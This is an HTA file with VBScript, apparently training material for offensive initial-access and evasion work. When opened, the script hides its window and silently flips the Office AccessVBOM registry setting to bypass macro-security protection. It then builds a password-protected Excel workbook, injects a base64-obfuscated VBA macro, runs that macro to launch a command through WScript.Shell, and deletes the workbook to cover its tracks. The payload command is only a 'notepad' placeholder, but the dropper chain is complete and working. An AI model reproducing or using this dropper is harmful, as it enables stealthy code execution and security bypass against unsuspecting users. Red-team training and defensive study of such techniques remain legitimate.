<!DOCTYPE html>
<html>
<head>
<HTA:APPLICATION icon="" WINDOWSTATE="normal" SHOWINTASKBAR="no" SYSMENU="no"  CAPTION="no" BORDER="none" SCROLL="no" />
<script type="text/vbscript">
'#
'# Copyright (C) Binary-Offensive.com Mariusz Banach - All Rights Reserved
'# Unauthorized copying of this file, via any medium is strictly prohibited.
'#
'# This file/directory was part of Modern Initial Access and Evasion Tactics training
'# delivered by binary-offensive.com and was provided as supplemental material.
'# 
'# Authored by Mariusz Banach <mb@binary-offensive.com>, @mariuszbit / mgeeky
'#

window.resizeTo 0,0
' Normal Base64 decoder (no +35 modifier)

Function obf_BinaryToString(obf_Binary)
    Dim obf_BinaryStream
    Set obf_BinaryStream = CreateObject("ADODB.Stream")

    obf_BinaryStream.Type = 1
    obf_BinaryStream.Open
    obf_BinaryStream.Write obf_Binary
    obf_BinaryStream.Position = 0
    obf_BinaryStream.Type = 2
    obf_BinaryStream.CharSet = "Windows-1252"

    obf_BinaryToString = obf_BinaryStream.ReadText
    Set obf_BinaryStream = Nothing
End Function

Function obf_StringToBinary(obf_b)
    Dim obf_enc
    Set obf_enc = CreateObject("System.Text.ASCIIEncoding")
    obf_StringToBinary = obf_enc.GetBytes_4(obf_b)
End Function

Private Function obf_DecodeBaseText64(ByVal obf_EncodedData)
    Dim obf_XmlDom, obf_XmlNode, obf_Decoded, obf_Counter, obf_Decoded2
    Set obf_XmlDom = CreateObject("Msxml2.DOMDocument.3.0")
    Set obf_XmlNode = obf_XmlDom.createElement("obf_someInternalName")
    obf_XmlNode.DataType = "bin.base64"
    obf_XmlNode.Text = obf_EncodedData
    obf_DecodeBaseText64 = obf_BinaryToString(obf_XmlNode.NodeTypedValue)

    Exit Function
End Function

Private Function obf_DecodeBase64(ByVal obf_EncodedData)
    Dim obf_temp
    obf_temp = obf_DecodeBaseText64(obf_EncodedData)
    obf_DecodeBase64 = obf_StringToBinary(obf_temp)
End Function

Sub obf_DropExcelWithMacro(obf_shell, obf_location)
    Dim obf_ExcelVer, obf_regPath1
    Dim obf_objWorkbook, obf_xlmodule
    Dim obf_code
    Dim obf_excel
    Dim obf_LaunchIt
    dim obf_password
    Dim obf_ExcelInterop, obf_ExcelProcess, obf_ExcelProcessVba

    obf_password = "zjMr7evGE8Wl"
    
    With CreateObject("Excel.Application")
        obf_ExcelVer = .Version
        
        obf_regPath1 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & obf_ExcelVer & "\Excel\Security\AccessVBOM"
        obf_shell.RegWrite obf_regPath1, 1, "REG_DWORD"
        
        Set obf_objWorkbook = .Workbooks.Add()
        obf_objWorkbook.Application.DisplayAlerts = False
        Set obf_xlmodule = obf_objWorkbook.VBProject.VBComponents.Add(1)
        
        obf_code = ""
        obf_code = obf_code & "U3ViIG9iZl9MYXVuY2hDb21tYW5kKEJ5VmFsIG9iZl9jb21tYW5kIEFzIFN0cmluZykNCiAgICBPbiBFcnJvciBHb1RvIG9iZl9Qcm9jRXJyb3IN"
        obf_code = obf_code & "CiAgICBXaXRoIENyZWF0ZU9iamVjdCgibmV3OjcyQzI0REQ1LUQ3MEEtNDM4Qi04QTQyLTk4NDI0Qjg4QUZCOCIpDQogICAgICAgIC5SdW4gLkV4cG"
        obf_code = obf_code & "FuZEVudmlyb25tZW50U3RyaW5ncyhvYmZfY29tbWFuZCksIDAsIEZhbHNlDQogICAgRW5kIFdpdGgNCm9iZl9Qcm9jRXJyb3I6"
        obf_code = obf_code & "DQpFbmQgU3ViDQoNClN1YiBvYmZfR2VuZXJhdG9yRW50cnlQb2ludCgpDQogICAgT24gRXJyb3IgR29UbyBvYmZfUHJvY0Vycm9yDQogICAgRGltIG9"
        obf_code = obf_code & "iZl9jb2RlDQogICAgb2JmX2NvZGUgPSAiIg0KICAgIA0KDQogICAgb2JmX0xhdW5jaENvbW1hbmQgIm5vdGVwYWQiDQoNCm9iZl9Qcm9jRXJyb3I6DQp"
        obf_code = obf_code & "FbmQgU3ViDQoNClN1YiBvYmZfTWFjcm9FbnRyeVBvaW50KCkNCiAgICBPbiBFcnJvciBSZXN1bWUgTmV4dA0KDQogICAgDQ"
        obf_code = obf_code & "ogICAgb2JmX0dlbmVyYXRvckVudHJ5UG9pbnQNCiAgICANCkVuZCBTdWINCg0KU3ViIHJ1bnRpbWUoKQ0KICAgIG9iZl9NYWNyb0VudHJ5UG9pbnQN"
        obf_code = obf_code & "CkVuZCBTdWI="
        obf_code = obf_DecodeBaseText64(obf_code)

        obf_xlmodule.CodeModule.AddFromString obf_code
        obf_objWorkbook.SaveAs obf_location, 55, obf_password

        Set obf_excel = .Workbooks.Open(obf_location, 0, True, , obf_password)
        .Run "runtime"
        obf_excel.Close true

        .Quit
    End With
End Sub

Sub obf_StartCreateExcelWithVBA()
    Dim obf_location, obf_path
    Dim obf_shell
    Set obf_shell = CreateObject("WScript.Shell")
    obf_path = obf_shell.ExpandEnvironmentStrings("%TEMP%")
    obf_location = obf_path & "\MyLittleExcel.xls.xls"
    
    Dim obf_FSO
    Set obf_FSO = CreateObject("Scripting.FileSystemObject")
    If obf_FSO.FolderExists(obf_path) Then
        If obf_FSO.FileExists(obf_location) Then
            obf_FSO.DeleteFile(obf_location)
        End If

        obf_DropExcelWithMacro obf_shell, obf_location
        obf_FSO.DeleteFile(obf_location)
    End If
End Sub

obf_StartCreateExcelWithVBA
</script>
</head>
<body>
</body>
</html>